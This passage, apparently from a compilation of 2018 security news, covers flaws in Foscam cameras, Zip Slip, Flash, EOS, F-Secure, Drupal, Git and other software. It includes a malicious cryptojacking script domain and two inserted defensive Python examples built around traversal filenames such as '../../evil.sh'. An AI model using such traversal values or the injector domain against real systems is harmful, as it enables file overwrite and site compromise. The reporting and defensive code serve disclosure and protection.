Step 3: The adversary crashes the webService process by exploiting CVE-2018-6832, a stack-based buffer overflow vulnerability in the webService process. After it crashes, the webService process is automatically restarted by the watchdog daemon, and during the process reload, the changes from step 2 take effect. The adversary is now able to gain administrative credentials.
Step 4: The adversary executes root commands by exploiting CVE-2018-6831. This is a shell command injection vulnerability that requires administrator credentials. Since the adversary gained administrator credentials in the previous stage, he can now use this vulnerability to execute commands as the root user for privilege escalation. Full details appear in the Technical Deep Dive below.

In June 2017, experts at F-Secure discovered tens of vulnerabilities in tens of thousands of Internet-connected cameras from China-based manufacturer Foscam, but at the time the Chinese firm ignored the report from the security firm.

The experts published a long list of affected Foscam device models and firmware versions; users are urged to update the firmware as soon as possible.

Many other camera models from other vendors are likely affected by the vulnerabilities, because Foscam also supplies its products in white-label form.


Critical Vulnerability Addressed in Popular Code Libraries
7.6.2018 securityweek
Vulnerebility

A critical and widespread arbitrary file overwrite vulnerability has been addressed in popular libraries of projects from HP, Amazon, Apache, Pivotal, and more.

Dubbed Zip Slip and discovered by Snyk Security, the vulnerability exists when the code that extracts files from an archive doesn’t validate the file paths in the archive.

The security flaw was responsibly disclosed to the impacted parties starting in mid-April and is said to impact thousands of projects. The issue has been found in multiple ecosystems, including JavaScript, Ruby, .NET and Go.

According to Snyk Security, Java has been impacted the most, as it lacks a central library for the high level processing of archive files. Because of that, vulnerable code snippets “were being hand crafted and shared among developer communities such as StackOverflow,” the security researchers explain.

Exploitation is possible via a specially crafted archive containing directory traversal filenames. Numerous archive formats are affected by the bug, including tar, jar, war, cpio, apk, rar and 7z.

“Zip Slip is a form of directory traversal that can be exploited by extracting files from an archive,” Snyk Security explains.

The directory traversal vulnerability allows an attacker to access parts of the file system residing outside of their target folder. The attacker can then overwrite executable files and achieve remote command execution on the victim’s machine when these files are executed. The flaw can also be abused to overwrite configuration files or other sensitive resources.

“The two parts required to exploit this vulnerability is a malicious archive and extraction code that does not perform validation checking,” the researchers explain.

First, the archive should contain one or more files designed to break out of the target directory when extracted. The contents of the archive need to be hand crafted, as archive creation tools “don’t typically allow users to add files with these paths,” Snyk Security notes. Armed with the right tools, however, an attacker can easily create files with these paths.

Second, the attacker needs to extract the archive, either using a library or own code.

“You are vulnerable if you are either using a library which contains the Zip Slip vulnerability or your project directly contains vulnerable code, which extracts files from an archive without the necessary directory traversal validation,” the researchers say.
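The validation the researchers describe, as an added example written for this article (it is not Snyk's code nor the code of any library named here): a constructed in-memory zip with one benign entry and one entry named `../../outside.txt`, a scan-before-extract check that lists every entry that would escape the target directory, and a hardened extractor that resolves each destination path and refuses the whole archive if any entry lies outside. The entry names, the directory paths and the function names are assumptions made for the example; Python's own `ZipFile.extractall` already strips `..` segments, so the pattern at issue is the hand-rolled "join destination with entry name" extractor the article says was copied between projects.

```python
"""Zip Slip check: refuse archive entries that would be written outside the target directory."""
import io
import os
import tempfile
import zipfile


class ZipSlipError(Exception):
    """Raised when an archive entry resolves to a path outside the extraction root."""


def build_sample_archive(include_traversal):
    """Constructed sample (not from the Snyk research): a zip with one benign entry
    and, optionally, one entry whose name climbs out of the extraction directory.
    zipfile.writestr keeps the name as given, so the '..' segments survive."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("docs/readme.txt", "benign content\n")
        if include_traversal:
            zf.writestr("../../outside.txt", "must never land outside the target\n")
    return buf.getvalue()


def resolved_target(dest_dir, entry_name):
    """The naive join that vulnerable extractors perform (dest + entry name), made
    absolute with '..' segments and symlinks collapsed so it can be compared to dest."""
    return os.path.realpath(os.path.join(dest_dir, entry_name))


def is_within(dest_dir, target):
    """True only if target is dest_dir itself or lies strictly beneath it."""
    root = os.path.realpath(dest_dir)
    return target == root or target.startswith(root + os.sep)


def find_traversal_entries(archive_bytes, dest_dir):
    """Scan-before-extract check: names of every entry that would escape dest_dir."""
    with zipfile.ZipFile(io.BytesIO(archive_bytes)) as zf:
        return [name for name in zf.namelist()
                if not is_within(dest_dir, resolved_target(dest_dir, name))]


def extract_safely(archive_bytes, dest_dir):
    """Hardened extractor. Every entry is validated before a single byte is written,
    so a benign entry cannot be used to stage files ahead of the malicious one.
    Returns the entry names that were written."""
    bad = find_traversal_entries(archive_bytes, dest_dir)
    if bad:
        raise ZipSlipError("traversal entries rejected: %s" % ", ".join(bad))
    written = []
    with zipfile.ZipFile(io.BytesIO(archive_bytes)) as zf:
        for info in zf.infolist():
            target = resolved_target(dest_dir, info.filename)  # already validated above
            if info.is_dir():
                os.makedirs(target, exist_ok=True)
                continue
            os.makedirs(os.path.dirname(target), exist_ok=True)
            with open(target, "wb") as fh:
                fh.write(zf.read(info))
            written.append(info.filename)
    return written


def demo():
    """Run the benign and the malicious constructed archive against a throwaway
    directory and report what happened."""
    with tempfile.TemporaryDirectory() as tmp:
        benign = extract_safely(build_sample_archive(False), tmp)
        try:
            extract_safely(build_sample_archive(True), tmp)
            rejected = None
        except ZipSlipError as exc:
            rejected = str(exc)
        # The path the naive join would have written to, and whether anything landed there.
        escaped = resolved_target(tmp, "../../outside.txt")
        leaked = os.path.exists(escaped)
    return {"benign": benign, "rejected": rejected, "escaped_path": escaped, "leaked": leaked}


if __name__ == "__main__":
    print(demo())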

In a GitHub repository, Snyk published a list of impacted libraries, which includes npm (language JavaScript), Java (language Java), .NET (languages: .NET and Go), Ruby gem (language Ruby), Go (language Go), Oracle (language Java), and Apache (language Java).

“Of the many thousands of projects that have contained similar vulnerable code samples or accessed vulnerable libraries, the most significant include: Oracle, Amazon, Spring/Pivotal, Linkedin, Twitter, Alibaba, Jenkinsci, Eclipse, OWASP, SonarCube, OpenTable, Arduino, ElasticSearch, Selenium, Gradle, JetBrains and Google,” the researchers note.

Snyk also notes that some projects were patched despite being confirmed not vulnerable, while others that continue to use the vulnerable code implementation are said to be not exploitable. Specifically, “it is believed that it would not be possible to attack these projects in such a way that could lead to a malicious outcome,” the researchers say.


Adobe Patches Flash Zero-Day Exploited in Targeted Attacks
7.6.2018 securityweek
Vulnerebility

[Updated] Security updates released by Adobe on Thursday for Flash Player patch four vulnerabilities, including a critical flaw that has been exploited in targeted attacks.

The vulnerability that has been exploited in the wild is tracked as CVE-2018-5002, and it has been described by Adobe as a stack-based buffer overflow that can be leveraged for arbitrary code execution.

The security hole was independently reported to Adobe by researchers at ICEBRG, Qihoo 360 and Tencent.

The researchers have yet to share any details, but Adobe did mention that CVE-2018-5002 has been exploited in limited, targeted attacks against Windows users. Hackers deliver the exploit via malicious Office documents that include specially crafted Flash content. The documents are distributed via email.

The latest version of Flash Player, 30.0.0.113, also patches a critical type confusion vulnerability that can lead to code execution (CVE-2018-4945), an “important” severity integer overflow that can result in information disclosure (CVE-2018-5000), and an “important” out-of-bounds read issue that can also lead to information disclosure (CVE-2018-5001).

CVE-2018-5000 and CVE-2018-5001 were reported anonymously through Trend Micro’s Zero Day Initiative (ZDI), while CVE-2018-4945 was reported to Adobe by researchers at Tencent.

Despite Adobe’s plans to kill Flash Player by 2020, threat actors apparently still find zero-day vulnerabilities highly useful.

This is the second zero-day discovered in 2018. The first was patched in February after North Korean hackers exploited it for several months in attacks aimed at South Korea.

UPDATE. According to the Advanced Threat Response Team at 360 Core Security, which discovered the Flash exploit on June 1, attacks involving CVE-2018-5002 appear to be mainly aimed at entities in the Middle East.

The exploit has been delivered using a specially crafted Excel spreadsheet named “salary.xlsx,” which includes salary information written in Arabic. A malicious SWF file that contains the zero-day exploit is downloaded from a remote server once the spreadsheet is opened. Researchers say the goal is to download a Trojan, but they have not provided any information on the malware.

Data collected from the command and control (C&C) server suggests that hackers have been making preparations for the attack since February. The C&C domain is designed to mimic a job search website in the Middle East and its name suggests that the target is located in Doha, Qatar.

360 Core Security has published technical details on CVE-2018-5002, which makes it easier for other threat groups to start exploiting the flaw.

UPDATE 2. ICEBRG’s Security Research Team (SRT) has also published a blog post detailing the attack and the Flash Player vulnerability.


Critical RCE Flaw Discovered in Blockchain-Based EOS Smart Contract System
7.6.2018 thehackernews 
Vulnerebility

Security researchers have discovered a series of new vulnerabilities in the EOS blockchain platform, one of which could allow remote hackers to take complete control of the node servers running critical blockchain-based applications.
EOS is an open source smart contract platform, known as 'Blockchain 3.0,' that allows developers to build decentralized applications on top of blockchain infrastructure, just like Ethereum.
Discovered by Chinese security researchers at Qihoo 360 (Yuki Chen of the Vulcan team and Zhiniang Peng of the Core security team), the vulnerability is an out-of-bounds buffer write in the function the node server uses to parse contracts.


To achieve remote code execution on a targeted node, all an attacker needs to do is upload a maliciously crafted WASM file (a smart contract) written in WebAssembly to the server.

As soon as the vulnerable parser reads the WASM file, the malicious payload is executed on the node, which could then be used to take control of the supernodes of the EOS network, the servers that collect transaction information and pack it into blocks.
"With the out of bound write primitive, we can overwrite the WASM memory buffer of a WASM module instance," the duo explained in their blog post published today.
"And with the help of our malicious WASM code, we finally achieve arbitrary memory read/write in the nodeos process and bypass the common exploit mitigation techniques such as DEP/ASLR on 64-bits OS. Once successfully exploited, the exploit starts a reverse shell and connects back to the attacker."
Once the attackers gained control over the supernode, they could eventually "pack the malicious contract into the new block and further control all nodes of the EOS network."


Since the supernodes can be controlled, the researchers said the attackers can "do whatever they want," including controlling virtual currency transactions and acquiring financial and private data from the node systems participating in the EOS network, such as a digital currency exchange, users' keys stored in wallets, key user profiles, private data, and much more.
"What's more, the attacker can turn a node in the EOS network into a member of a botnet, launch a cyber attack or become a free 'miner' and dig up other digital currencies," the researchers told THN.
Researchers have detailed how to reproduce the vulnerability and also released a proof-of-concept exploit, along with a video demonstration, which you can watch on their blog post.
The exploit demonstrated by the 360Vulcan researcher can bypass multiple default security mitigation measures to achieve complete control over the super node running the malicious contract.
The pair responsibly reported the vulnerability to the maintainers of the EOS project, and they have already released a fix for the issue on GitHub.
"In Blockchain networks and digital currency systems, there are many attack surfaces existing in nodes, digital wallets, mining pools and smart contracts. 360 security team has previously discovered and disclosed multiple relevant high risk vulnerabilities," the researchers said.
The researchers believe the new type of vulnerability affects not only EOS but also other blockchain platforms and virtual currency applications.


Flaw in F-Secure Products Allowed Code Execution via Malicious Archives
6.6.2018 securityweek
Vulnerebility

A critical vulnerability affecting many consumer and corporate products from F-Secure could have been exploited for remote code execution using specially crafted archive files.

A researcher who uses the online moniker “landave” has identified several vulnerabilities related to 7-Zip, an open source file archiver used by many commercial products. Some of the security holes impact 7-Zip and products using it, while others are specific to the third-party implementations of 7-Zip.

Some of the vulnerabilities, disclosed in 2017, impact Bitdefender products. On Tuesday, landave published a blog post describing how one of the 7-Zip bugs he identified last year, namely CVE-2018-10115, can be used to achieve remote code execution on most F-Secure endpoint protection products for Windows.

The details of the vulnerability have been disclosed after F-Secure rolled out a patch via its automatic update mechanisms on May 22. Users don’t need to take any action, unless they explicitly disabled automatic updates.

The list of impacted products includes F-Secure SAFE for Windows, Client Security, Client Security Premium, Server Security, Server Security Premium, PSB Server Security, Email and Server Security, Email and Server Security Premium, PSB Email and Server Security, PSB Workstation Security, Computer Protection, and Computer Protection Premium.

Exploiting the vulnerability against 7-Zip directly was relatively easy and it only required the targeted user to extract a specially crafted RAR file. However, in the case of F-Secure products, exploitation is more difficult due to the use of the Address Space Layout Randomisation (ASLR) memory protection system.

However, landave has found a way to bypass the protection and achieve code execution via malicious RAR files. The attacker could have sent the malicious file to the victim attached to an email, but this attack scenario required that the recipient manually trigger a scan of the file.

A more efficient method involved getting the victim to visit a malicious web page set up to automatically download the exploit file.

“It turns out that F-Secure’s products intercept HTTP traffic and automatically scan files with up to 5MB in size. This automatic scan includes (by default) the extraction of compressed files. Hence, we can deliver our victim a web page that automatically downloads the exploit file. To do this silently (preventing the user even from noticing that a download is triggered), we can issue an asynchronous HTTP request,” the researcher explained.

In its own advisory, F-Secure said the flaw could have been exploited to take complete control of a system, but there was no evidence of exploitation before the release of the patch.

The security firm also pointed out that some user interaction was required for the exploit to work and noted that archive scanning is only triggered if the “Scan inside compressed files” option is enabled.

F-Secure has paid out a bug bounty, but the amount has not been disclosed. According to its Vulnerability Rewards Program page, the company offers up to €5,000 ($5,800) for vulnerabilities that allow remote code execution on the client software.


Over 115,000 Drupal Sites still vulnerable to Drupalgeddon2, a gift to crooks
6.6.2018 securityaffairs
Vulnerebility

Two months after the release of the security updates for the Drupalgeddon2 flaw, experts continue to see vulnerable websites running on flawed versions of Drupal whose operators have not installed the security patches.
In March, the Drupal developer Jasper Mattsson discovered a “highly critical” vulnerability, tracked as CVE-2018-7600, aka Drupalgeddon2, affecting Drupal 7 and 8.

Drupal 8.3.x and 8.4.x are no longer supported, but due to the severity of the flaw, the Drupal Security Team decided to address it with specific security updates that were issued a few days later.

The vulnerability could be exploited by an attacker to run arbitrary code in the CMS core and take over a website simply by accessing a URL.

After the publication of a working proof-of-concept for Drupalgeddon2 on GitHub, experts started observing attackers using it to deliver backdoors and crypto miners.


According to the security researcher Troy Mursch, there are over 115,000 Drupal sites that have not installed the security patches for the Drupalgeddon2 vulnerability.

The expert scanned the Internet for websites running Drupal 7.x and found over 500,000 sites; 115,070 of them were running outdated versions of the popular CMS that were vulnerable to the Drupalgeddon2 flaw. The scan did not cover 6.x and 8.x sites.
“How many Drupal sites are vulnerable? To find the answer, I began by looking for sites using Drupal 7. This is the most widely used version, per Drupal’s core statistics. Using the source code search engine PublicWWW, I was able to locate nearly 500,000 websites using Drupal 7.” states a report published by Mursch.

“Upon completion of the scan I was able to determine:

115,070 sites were outdated and vulnerable.
134,447 sites were not vulnerable.
225,056 sites I could not ascertain the version used.”

The researcher found numerous vulnerable sites in the Alexa Top 1 Million, the list includes major US educational institutions, government organizations around the world, a large television network, a multinational mass media and entertainment conglomerate, and two major computer hardware manufacturers.

The expert shared the list of vulnerable websites with US-CERT and other CERT teams worldwide.

Mursch confirmed that cryptojacking campaigns have continued even after his first report:

“While scanning for vulnerable sites, I discovered a new cryptojacking campaign targeting Drupal sites. One of the affected sites was a police department’s website in Belgium. This campaign uses the domain name upgraderservices[.]cf to inject Coinhive.” added the expert.

The expert published a Google Docs spreadsheet to track the original cryptocurrency mining campaign, the document includes now data on several different campaigns he discovered.

Bad Packets Report (@bad_packets), 9:37 AM - May 31, 2018: “This Belgium police website (http://votrepolice.be/ ) has been compromised and is now part of the Drupal cryptojacking campaign.”

Bad Packets Report (@bad_packets), 9:37 AM - May 31, 2018: “This case of #cryptojacking is caused by upgraderservices[.]cf/drupal.js which injects #Coinhive. Site key "ZQXBo9BIgCBhlxCYhc7UAWLJxBfRCVos" is used.”
The expert published IoCs for the campaign. The presence online of 115,000 vulnerable Drupal 7.x websites is very dangerous, a gift for crooks who can abuse them for a broad range of illegal activities.


‘Zip Slip’ arbitrary file overwrite vulnerability affects thousands of projects
6.6.2018 securityaffairs
Vulnerebility

Security experts from the British software firm Snyk have discovered a critical vulnerability, dubbed ‘Zip Slip’, that affects thousands of projects across many industries.
The flaw, which remained hidden for years, could be exploited by attackers to execute arbitrary code on vulnerable systems.


Zip Slip is an arbitrary file overwrite vulnerability that can be triggered through a directory traversal attack while extracting files from an archive.

Unfortunately, the flaw affects many archive formats, including tar, jar, war, cpio, apk, rar, and 7z.

“Zip Slip is a widespread arbitrary file overwrite critical vulnerability, which typically results in remote command execution.” states the blog post published by the experts.

“It was discovered and responsibly disclosed by the Snyk Security team ahead of a public disclosure on 5th June 2018, and affects thousands of projects, including ones from HP, Amazon, Apache, Pivotal and many more (CVEs and full list here).”

Thousands of projects written in several programming languages (i.e. JavaScript, Ruby, Java, .NET and Go), including ones from tech giants, contain vulnerable libraries and code.

Attackers can trigger the Zip Slip flaw using a specially crafted archive file whose entries hold directory traversal filenames (e.g. ../../evil.sh).
When vulnerable code or a vulnerable library extracts the contents of such an archive, the attacker’s files are written outside the folder in which they should reside.

“The premise of the directory traversal vulnerability is that an attacker can gain access to parts of the file system outside of the target folder in which they should reside. The attacker can then overwrite executable files and either invoke them remotely or wait for the system or user to call them, thus achieving remote command execution on the victim’s machine.” continues the analysis.

“The vulnerability can also cause damage by overwriting configuration files or other sensitive resources, and can be exploited on both client (user) machines and servers.”

The researchers published proof-of-concept Zip Slip archives and released a video PoC for the Zip Slip flaw.

The experts shared two sample malicious zip and tar files (for both Unix and Windows file systems) whose filenames cause a file to be extracted to the /tmp/ or \Temp\ folders.
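To make the missing check concrete, here is an added example (not Snyk's code or any library's API) that validates every entry name before writing, fed with constructed in-memory zip and tar archives carrying the ../../evil.sh name from the post:

```python
"""Archive extraction with the directory traversal validation that Zip Slip exploits the absence of.

Added example, not Snyk's code or any library's API. The two archives are
constructed in memory with the "../../evil.sh" name from the article; nothing
is ever written outside the destination directory.
"""
import io
import os
import tarfile
import tempfile
import zipfile


def stays_inside(dest_dir, entry_name):
    """True only if dest_dir/entry_name resolves to a path under dest_dir."""
    dest_real = os.path.realpath(dest_dir)
    # os.path.join drops dest_real if entry_name is absolute, and realpath
    # collapses "../" segments, so any escaping name ends up outside dest_real.
    target = os.path.realpath(os.path.join(dest_real, entry_name))
    return os.path.commonpath([dest_real, target]) == dest_real


def zip_entries(data):
    """Yield (name, is_dir, content) for each entry of an in-memory zip."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            yield info.filename, info.is_dir(), None if info.is_dir() else zf.read(info)


def tar_entries(data):
    """Yield (name, is_dir, content) for an in-memory tar. Links are yielded with
    content None so they are rejected: a link target can escape dest_dir too."""
    with tarfile.open(fileobj=io.BytesIO(data), mode="r:*") as tf:
        for member in tf.getmembers():
            if member.isdir():
                yield member.name, True, None
            elif member.isfile():
                yield member.name, False, tf.extractfile(member).read()
            else:
                yield member.name, False, None


def extract_entries(dest_dir, entries):
    """Write validated entries below dest_dir; return (written, rejected) names."""
    written, rejected = [], []
    for name, is_dir, content in entries:
        # Vulnerable extractors skip this check and join the name straight onto dest_dir.
        if not stays_inside(dest_dir, name) or (not is_dir and content is None):
            rejected.append(name)
            continue
        target = os.path.join(dest_dir, name)
        if is_dir:
            os.makedirs(target, exist_ok=True)
        else:
            os.makedirs(os.path.dirname(target), exist_ok=True)
            with open(target, "wb") as fh:
                fh.write(content)
        written.append(name)
    return written, rejected


def build_samples():
    """Constructed zip and tar archives: one benign entry, one traversal entry."""
    files = [("good/readme.txt", b"benign"), ("../../evil.sh", b"# constructed placeholder\n")]
    zbuf = io.BytesIO()
    with zipfile.ZipFile(zbuf, "w") as zf:
        for name, body in files:
            zf.writestr(name, body)
    tbuf = io.BytesIO()
    with tarfile.open(fileobj=tbuf, mode="w") as tf:
        for name, body in files:
            info = tarfile.TarInfo(name)
            info.size = len(body)
            tf.addfile(info, io.BytesIO(body))
    return zbuf.getvalue(), tbuf.getvalue()


def run_demo():
    """Extract both samples into fresh temp dirs; return per-format results."""
    zip_data, tar_data = build_samples()
    results = {}
    for fmt, entries in (("zip", zip_entries(zip_data)), ("tar", tar_entries(tar_data))):
        dest = tempfile.mkdtemp(prefix="zipslip-demo-")
        written, rejected = extract_entries(dest, entries)
        results[fmt] = {"written": written, "rejected": rejected}
    return results


if __name__ == "__main__":
    for fmt, result in run_demo().items():
        print(fmt, result)
```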

Snyk has privately reported the flaw to the maintainers of all vulnerable libraries and projects since April, and it maintains a GitHub repository listing all flawed projects. The repository is open to contributions from the wider community to ensure it holds the most up-to-date status.


Crooks included the code for CVE-2018-8174 IE Zero-Day in the RIG Exploit Kit
3.6.2018 securityaffairs
Vulnerebility

Cyber criminals recently added the code for the CVE-2018-8174 Internet Explorer zero-day vulnerability to the infamous RIG exploit kit.

The Internet Explorer zero-day vulnerability, tracked as CVE-2018-8174, was first discovered a few weeks ago; it affects the VBScript implementation used in Internet Explorer and Microsoft Office.

Researchers from the Advanced Threat Response Team of 360 Core Security Division first reported the zero-day.

In May, the Advanced Threat Response Team of 360 Core Security Division detected an APT attack exploiting a 0-day vulnerability and captured the world’s first malicious sample that uses it. The experts codenamed the exploit “double kill”.

Qihoo 360 researchers reported the vulnerability to Microsoft that addressed the flaw in the May 2018 Patch Tuesday security updates.

After the release of the security updates, on May 8, experts from Kaspersky Lab and Malwarebytes published a detailed analysis of the vulnerability, while researchers from Morphisec security firm released a proof-of-concept (PoC) code.

Experts released a Metasploit module for the exploitation of the CVE-2018-8174 once the PoC code was available online.

The availability of PoC code for a vulnerability is a gift for vxers; in this case, the crooks included the code for the CVE-2018-8174 flaw in the RIG exploit kit.

“A Proof of Concept for Internet Explorer 11 on Windows 7 has been shared publicly 3 days ago, it’s now being integrated in Browser Exploit Kits.” wrote the security researcher Kafeine.

“This will replace CVE-2016-0189 from July 2016 and might shake the Drive-By landscape for the coming months.”


Researchers from Trend Micro also observed that the RIG Exploit Kit is now leveraging CVE-2018-8174 to deliver a Monero cryptocurrency miner.

“Along with updates in code, we also observed Rig integrating a cryptocurrency-mining malware as its final payload.” reads the analysis from Trend Micro.

“Based on the latest activities we’ve observed from Rig, they’re now also exploiting CVE-2018-8174, a remote code execution vulnerability patched in May and reported to be actively exploited.”

Cyber criminals were hijacking the traffic of legitimate sites and redirecting IE users to compromised websites hosting the RIG exploit kit. The RIG exploit kit was used to drop the Smoke Loader malware, a tiny dropper used to install a cryptocurrency miner on the infected system.



Tens of Vulnerabilities Found in Quest Appliances
3.6.2018 securityweek
Vulnerebility

Researchers at Core Security say they have discovered a total of more than 60 vulnerabilities in disk backup and system management appliances from Quest. The IT management firm has released patches, but threatened to take legal action against Core if it disclosed too many details.

More than 50 security holes have been found in Quest’s DR series disk backup appliances. The most serious of the flaws, according to Core, allows a remote and unauthenticated attacker to execute arbitrary system commands via the “password” parameter of the login process.

Experts also identified 45 other command injection issues in the product, but these require authentication. Core also claims to have uncovered six privilege escalation vulnerabilities that allow an attacker to gain root permissions.

The weaknesses impact Quest DR Series Disk Backup software version 4.0.3 and possibly earlier, and they have been patched with the release of version 4.0.3.1.

A separate advisory from Core describes 11 flaws affecting Quest’s KACE Systems Management Appliance. Researchers found that the product’s web console is affected by three command injection vulnerabilities, including one that can be exploited by an unauthenticated attacker.

The list of security holes found in this product also includes privilege escalation, SQL injection, cross-site scripting (XSS), and path traversal issues.

The vulnerabilities have been patched with a hotfix that is available for Quest KACE System Management Appliance versions 7.0, 7.1, 7.2, 8.0, and 8.1.

During the disclosure of the KACE flaws, Quest told Core that its work is in breach of the vendor’s license agreement and asked the security firm not to make its findings public to avoid legal action.

Quest, whose products are reportedly used by 130,000 companies, does have a responsible disclosure policy, but it states that reports of any vulnerability are considered the company’s confidential and proprietary information and cannot be disclosed to third parties.

Core has only published limited information about each of the vulnerabilities, but the company says it’s disappointed by Quest’s posture on disclosure.

“CoreLabs has been publishing security advisories since 1997 and believes in coordinated disclosure and good faith collaboration with software vendors before disclosure to help ensure that a fix or workaround solution is ready and available when the vulnerability details are publicized. We believe that providing technical details about each finding is necessary to provide users and organizations with enough information to understand the implications of the vulnerabilities against their environment and, most importantly, to prioritize the remediation activities aiming at mitigating risk,” Core said.


WordPress Disables Plugins That Expose e-Commerce Sites to Attacks
2.6.2018 securityweek
Vulnerebility

Researchers discovered vulnerabilities in ten WordPress plugins made by a company for e-commerce websites powered by the WooCommerce platform. WordPress disabled many of them after the developer failed to release patches.

WordPress security firm ThreatPress reported on Thursday that its researchers discovered various types of flaws in ten plugins from Multidots. The impacted plugins are available through WordPress.org and they allow WooCommerce users to manage different aspects of their online shops.

The vulnerable plugins have nearly 20,000 active installs, including 10,000 installations of Page Visit Counter, 3,000 installations of WooCommerce Category Banner Management, and 2,000 installations of WooCommerce Checkout for Digital Goods.

Experts discovered that the plugins made by Multidots are impacted by stored cross-site scripting (XSS), cross-site request forgery (CSRF) and SQL injection vulnerabilities that could be exploited to take complete control of impacted e-commerce sites.

According to researchers, attackers could deface websites, execute remote shells, plant keyloggers, and upload cryptocurrency miners or other types of malware. Attackers may be able to gain access to valuable information considering that the affected websites are online shops that collect personal and financial information.

“The vulnerabilities allow an unauthenticated attacker to inject malicious JavaScript, and thus provide the opportunity to hijack clients’ credit cards data and to receive clients’ and administrator’s logins,” ThreatPress’s Rasa Adams told SecurityWeek.

While exploitation in many cases requires the victim to access a specially crafted URL or visit a certain page, some of the flaws can be exploited without any user interaction.

Multidots was informed of the vulnerabilities on May 8 and confirmed the issues. However, after seeing that the developer failed to take any action, ThreatPress notified WordPress, which decided to disable a majority of the impacted plugins.

SecurityWeek reached out to Multidots for comment before ThreatPress made its findings public, but the company has not responded.

CVE identifiers have been assigned to four of the vulnerabilities and ThreatPress says it expects more to be assigned. The identifiers assigned to date are CVE-2018-11579, CVE-2018-11580, CVE-2018-11633 and CVE-2018-11632.

ThreatPress has published technical details and proof-of-concept (PoC) code for each of the vulnerabilities.

“It’s good to know that WordPress Security reacts quickly, but still, we have a big problem. There is no way to inform all users of these plugins about the threat,” Adams said in a blog post. “It’s strange that WordPress can show you information about available updates, but still can’t protect you by providing the information about closed plugins in the same way. We hope to see some changes in this area. In this case, we could notify owners of affected websites and secure almost twenty thousand websites.”


Flaws in Multidots WordPress Plugins expose e-Commerce websites to a broad range of attacks
2.6.2018 securityaffairs
Vulnerebility

Researchers at the ThreatPress firm discovered security vulnerabilities in ten WordPress plugins developed by Multidots for e-commerce websites.
The vulnerable plugins are available on WordPress.org and implement a set of features for WooCommerce installations that allow admins to manage their online shops; nearly 20,000 WordPress installs currently use them.

“Recently our research team found serious security issues in ten WordPress plugins developed by the same vendor – MULTIDOTS Inc. company. All vulnerable plugins are designed to work alongside WooCommerce, so there is a real threat to all online stores powered by WooCommerce and one of these plugins.” reads a blog post published by ThreatPress.

“We found Stored Cross-Site Scripting (XSS), Cross-Site Request Forgery and SQL Injection vulnerabilities that could be exploited by hackers to upload keyloggers, shells, crypto miners and other malicious software or completely deface the website.”


Multidots plugins are affected by stored cross-site scripting (XSS), cross-site request forgery (CSRF) and SQL injection vulnerabilities that could be exploited by an attacker to take complete control of e-commerce installs.

The flaws, tracked as CVE-2018-11579, CVE-2018-11580, CVE-2018-11633 and CVE-2018-11632, could allow attackers to carry out a broad range of attacks, such as installing cryptocurrency miners or exploit kits to deliver malware.

Experts warn that some vulnerabilities could be exploited without any user interaction.

The researchers at ThreatPress reported the flaws to Multidots on May 8; the company acknowledged them but, at the time of writing, had still not fixed them.

ThreatPress published technical details for the vulnerabilities and for each of them a proof-of-concept (PoC) code.

“It’s good to know that WordPress Security reacts quickly, but still, we have a big problem. There is no way to inform all users of these plugins about the threat,” Adams said in a blog post. “It’s strange that WordPress can show you information about available updates, but still can’t protect you by providing the information about closed plugins in the same way. We hope to see some changes in this area. In this case, we could notify owners of affected websites and secure almost twenty thousand websites.”


Tens of Vulnerabilities Found in Pentagon Travel Management System
31.5.2018 securityweek 
Vulnerebility

HackerOne announced on Wednesday the results of “Hack the DTS,” the fifth bug bounty program run by the U.S. Department of Defense (DOD).

The DTS (Defense Travel System) is a fully integrated and automated travel management system created specially for the DOD. The platform is said to be accessed by roughly 100,000 unique users every day, including for creating authorizations, receiving approvals, preparing reservations, and generating travel vouchers.

The Pentagon wanted to test the security of the platform and selected 19 vetted hackers from HackerOne to complete the task. Researchers, mainly from the United States and the United Kingdom, submitted more than 100 vulnerability reports, 65 of which were classified as unique and valid, including 28 that described critical and high severity flaws.

White hat hackers earned a total of $78,650 for their findings, with the highest single payout, $5,000, paid out eight times.

“DTS is relied on by DoD travelers. More than 9,500 sites operate worldwide, and the security of these systems is mission-critical,” said Jack Messer, project lead at Defense Manpower Data Center (DMDC). “The ‘Hack the DTS’ challenge helped uncover vulnerabilities we wouldn’t have found otherwise, complementing the great work DMDC is already doing to protect critical enterprise systems and the people those systems serve.”

HackerOne pointed out that Hack the DTS was the second government bug bounty program that allowed participants to use social engineering.

The Pentagon has awarded researchers hundreds of thousands of dollars for finding thousands of vulnerabilities in its systems. The money was paid out through the Hack the Pentagon, Hack the Air Force, Hack the Army, and Hack the Air Force 2.0 bug bounty programs.


CVE-2018-11235 flaw in Git can lead to arbitrary code execution
30.5.2018 securityaffairs
Vulnerebility  

The Git community has disclosed a dangerous vulnerability in Git, tracked as CVE-2018-11235, that can lead to arbitrary code execution when a user operates on a malicious repository.
The Git development team and firms offering Git repository hosting services have issued security updates to address the remote code execution vulnerability, tracked as CVE-2018-11235, in the Git source code versioning software.

“In Git before 2.13.7, 2.14.x before 2.14.4, 2.15.x before 2.15.2, 2.16.x before 2.16.4, and 2.17.x before 2.17.1, remote code execution can occur.” reads the description provided by the Mitre organization.

“With a crafted .gitmodules file, a malicious project can execute an arbitrary script on a machine that runs “git clone --recurse-submodules” because submodule “names” are obtained from this file, and then appended to $GIT_DIR/modules, leading to directory traversal with “../” in a name. Finally, post-checkout hooks from a submodule are executed, bypassing the intended design in which hooks are not obtained from a remote server.”

The vulnerability was discovered by the researcher Etienne Stalmans as part of GitHub’s bug bounty program.

Git 2.17.1 addresses the CVE-2018-11235 vulnerability along with the CVE-2018-11233 flaw.

CVE-2018-11235 could be exploited by an attacker who sets up a malformed Git repository containing a specially built Git submodule. The attacker needs to trick victims into cloning the rogue repository to execute arbitrary code on their systems.

The problem resides in the way the Git client handles the specially-built Git submodule.

The release also includes a server-side check that Git hosting services can use to detect code repositories containing malicious submodules and reject their upload.

“In addition to the above fixes, this release adds support on the server side that reject pushes to repositories that attempt to create such problematic .gitmodules file etc. as tracked contents, to help hosting sites protect their customers with older clients by preventing malicious contents from spreading.” reads the release notes for v2.17.1.

“This is enabled by the same receive.fsckObjects configuration on the server side as other security and sanity related checks (e.g. rejecting tree entry “.GIT” in a wrong case as tracked contents, targeting victims on case insensitive systems) that have already been implemented in the past releases. It is recommended to double check your configuration if you are hosting contents for other people.”
